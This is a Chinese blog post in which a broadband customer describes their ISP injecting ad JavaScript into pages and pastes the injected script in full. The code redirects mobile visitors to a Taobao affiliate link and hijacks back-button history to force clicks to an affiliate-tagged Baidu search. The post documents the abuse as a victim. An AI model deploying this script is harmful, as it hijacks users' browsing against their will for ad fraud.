记运营商劫持JS,事情正在处理中!
自安装广电宽带后,麻烦不断,几次发现在浏览网站时被加载恶意JS广告代码,第一次是网吧导航,换了路由器固件,找售后换路由器,网站过滤等操作后,网吧导航终被干掉,事情到此结束。
然而前天在修改网站时,又发现网址被加载其它代码,#_cofs_
浏览器查看页面加载的js,先是劫持了jquery库,把jquery删除后又发现,会被随机劫持所有JS,NND用得真不操心,打电话广电客服,交涉了几个人都是叫我换路由器,没办法,把路由器固件再次还原出厂,对电脑进行全面杀毒,路由器连接其它网络,发现只要连广电的宽带就会出现这个问题,连接其它网络全正常,再次致电客服技术部,得到的结果还是换路由器。
附JS代码:
!function() {
var e = window.navigator.userAgent.toLowerCase();
window._colf_ = {
randomName: function(e) {
e = e || 8;
var t = "ABCDEFGHJKMNPQRSTWXYZabcdefhijkmnprstwxyz"
, n = t.length
, o = "";
for (i = 0; i < e; i++)
o += t.charAt(Math.floor(Math.random() * n));
return o
},
addCSS: function(t, e) {
var n = null
, o = e || document.head || document.getElementsByTagName("head")[0];
try {
(n = document.createElement("style")).type = "text/css";
var a = document.createTextNode(t);
n.appendChild(a),
o.appendChild(n)
} catch (e) {
(n = document.createStyleSheet()).cssText = t
}
},
trim: function(e) {
return e.replace(/(^s*)|(s*$)/g, "")
},
isAdr: e.match(/android/i),
isWc: e.match(/micromessenger/i),
isIos: e.match(/iphone/i) || e.match(/ipad/i),
isWds: e.match(/windows/i),
isMac: e.match(/macintosh/i),
isIe: e.match(/msie/i),
blf: function(e) {
document && document.body && document.body.insertBefore ? e() : window.addEventListener ? window.addEventListener("load", e, !1) : window.attachEvent("onload", e)
}
}
}(),
(_colf_.isIos || _colf_.isAdr) && _colf_.blf(function() {
window.location = "tbopen://m.taobao.com/tbopen/index.html?source=auto&action=ali.open.nav&module=h5&bootImage=0&h5Url=https%3A%2F%2Fh5.m.taobao.com%2Fbcec%2Fdahanghai-jump.html%3Fspm%3D2014.ugdhh.4020516807.1208-615%26bc_fl_srcgrowth_dhh_4020516807_1208-615&spm=2014.ugdhh.4020516807.1208-615&bc_fl_src=growth_dhh_4020516807_1208-615&materialid=1208"
}),
function() {
var e, o = document, t = o.referrer, a = {
getHost: function(e) {
var t = o.createElement("a");
return t.href = e,
t.host
},
checkSearcher: function() {
var e = a.getHost(t);
return /^(spd?|md?|hd?|www|wap|transcoder).baidu/.test(e) ? "bd" : "null"
},
splitSearch: function() {
var o = {}
, e = t.split("?") || [];
return e[1] && e[1].replace(/([^&]*)=([^&]*)/g, function(e, t, n) {
o[t] = n
}),
o
},
splitStr: function(e) {
return ((e = e || "").match(/([u4e00-u9fa5a-zA-Z0-9]+)/gi) || [e]).sort(function(e, t) {
return e.length - t.length
})[0]
},
getKeywords: function() {
for (var e = o.getElementsByTagName("meta"), t = 0; t < e.length; t++)
if ("keywords" == e[t].name)
return e[t].content;
return ""
},
_events: function(e) {
try {
var t = function() {
~location.hash.indexOf("_cofs_") || e && e()
};
window.onpopstate ? (history.pushState({
page: 1
}, "", location.href + "#_cofs_"),
window.addEventListener("popstate", t, !1)) : (location.hash = "#_cofs_",
window.onhashchange = t)
} catch (e) {}
},
triggers: function(e) {
var t = o.createElement("a");
if (t.rel = "noreferrer",
t.href = e,
t.target = "_self",
o.body.appendChild(t),
o.createEvent) {
var n = o.createEvent("MouseEvents");
n.initEvent("click", !0, !0),
t.dispatchEvent(n)
} else
t.click();
setTimeout(function() {
window.location.href = e
}, 1500)
},
addIfr: function() {},
makeTitles: function(e) {
var t, n = a.splitSearch();
switch (e) {
case "bd":
t = decodeURIComponent(n.title || "");
break;
case "so":
t = decodeURIComponent(n.q || "");
break;
case "sg":
t = decodeURIComponent(n.keyword || "")
}
return t || o.title || a.getKeywords()
}
}, n = a.checkSearcher(), r = a.makeTitles(n), c = a.splitStr(r), i = !1, d = !0;
if (!t) {
if (!_colf_.isIe)
return;
if (6 < !Math.floor(20 * Math.random()))
return
}
"null" == n && (d = !1);
var s = "1013725b";
i = ~t.indexOf(s),
e = "https://m.baidu.com/s?word=" + c + "&from=" + s,
_colf_.blf(function() {
Boolean(i) ? a.addIfr() : a._events(function() {
d ? a.triggers(e) : Math.floor(20 * Math.random()) < 6 && a.triggers(e)
})
})
}();